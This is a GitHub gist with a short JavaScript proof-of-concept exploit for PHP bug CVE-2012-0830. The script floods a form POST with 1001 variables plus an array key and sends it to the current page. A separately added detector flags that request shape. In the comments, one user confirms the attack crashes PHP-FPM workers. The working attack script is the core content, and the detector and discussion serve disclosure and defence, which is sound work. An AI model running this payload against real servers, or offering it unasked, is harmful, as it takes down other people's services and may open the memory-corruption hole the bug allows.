@pilate
Created February 2, 2012 20:11
// Simple proof of concept for PHP bug (CVE-2012-0830) described by Stefan Esser (@i0n1c)
// http://thexploit.com/sec/critical-php-remote-vulnerability-introduced-in-fix-for-php-hashtable-collision-dos/
// Generate 1000 normal keys and one array
function createEvilObj () {
    var evil_obj = {};
    for (var i = 0; i < 1001; i++) {
        evil_obj[i] = 1;
    }
    evil_obj['kill[]'] = 'kill';
    return evil_obj;
}
// Serialize Javascript object into POST data
function serializeObj (obj) {
    var str = [];
    for(var p in obj) {
        str.push(p + "=" + obj[p]);
    }
    return str.join("&");
}
// Run attack
function attackSite () {
    var bad = serializeObj(createEvilObj());
    var xhr = new XMLHttpRequest();
    xhr.open("POST", location.href, true);
    xhr.setRequestHeader('Content-Type','application/x-www-form-urlencoded');
    xhr.setRequestHeader('Content-Length', bad.length);
    xhr.send(bad);
}
attackSite();
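
A defender-side check for the request shape this proof of concept sends, added here as an example and not part of the original gist: it parses a raw form body and flags an array-style key that arrives after the variable limit is already used up. The names `inspectFormBody` and `buildSample` and the threshold of 1000 (PHP's default `max_input_vars`) are assumptions of this example, and the check is a heuristic for logging or WAF-style filtering, not a substitute for upgrading PHP.

```javascript
// Added example: flag form bodies shaped like the CVE-2012-0830 trigger.
// Assumption: the limit mirrors PHP's default max_input_vars of 1000.
const MAX_INPUT_VARS = 1000;

// Decode a form-encoded key; malformed escapes are kept raw instead of throwing.
function decodeKey(raw) {
  try {
    return decodeURIComponent(raw.replace(/\+/g, ' '));
  } catch (e) {
    return raw;
  }
}

// Inspect a raw application/x-www-form-urlencoded body.
function inspectFormBody(body, limit = MAX_INPUT_VARS) {
  const pairs = body.split('&').filter((p) => p.length > 0);
  let arrayKeys = 0;
  let firstArrayPastLimit = -1;
  pairs.forEach((pair, index) => {
    const eq = pair.indexOf('=');
    const key = decodeKey(eq === -1 ? pair : pair.slice(0, eq));
    // PHP treats name[...] as an array element; decoding also catches %5B%5D.
    if (/\[[^\]]*\]/.test(key)) {
      arrayKeys++;
      if (index >= limit && firstArrayPastLimit === -1) {
        firstArrayPastLimit = index;
      }
    }
  });
  return {
    paramCount: pairs.length,
    arrayKeys: arrayKeys,
    overLimit: pairs.length > limit,
    firstArrayPastLimit: firstArrayPastLimit,
    // Pattern of interest: `limit` variables were already seen when an array key arrives.
    suspicious: firstArrayPastLimit !== -1,
  };
}

// Build a constructed sample body (not captured traffic): N scalar keys plus an optional tail.
function buildSample(scalarCount, tail) {
  const parts = [];
  for (let i = 0; i < scalarCount; i++) parts.push(i + '=1');
  if (tail) parts.push(tail);
  return parts.join('&');
}
```

A large form with no array keys sets `overLimit` without `suspicious`, so the two conditions can be alerted on separately.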
@adrian-rt

There are actually 1001 normal keys + one array there...

@Tatsh
Tatsh commented Feb 3, 2012

My server uses nginx and proxies through PHP-FPM. For one thing, Chrome refuses line 29 (at least in the console). But this does work. A call to attackSite() results in one of the PHP instances dying:

2012/02/03 10:06:42 [error] 22018#0: *692 recv() failed (104: Connection reset by peer) while reading response header from upstream

Then it is brought back up. So I guess if I had a lot of people doing this attack even with PHP-FPM there'd be some real trouble.

@adrian-rt

It was just an observation really. Can you provide some technical details about what exactly happens inside PHP?
I know some PHP internals, but not enough for this actually... Thanks!
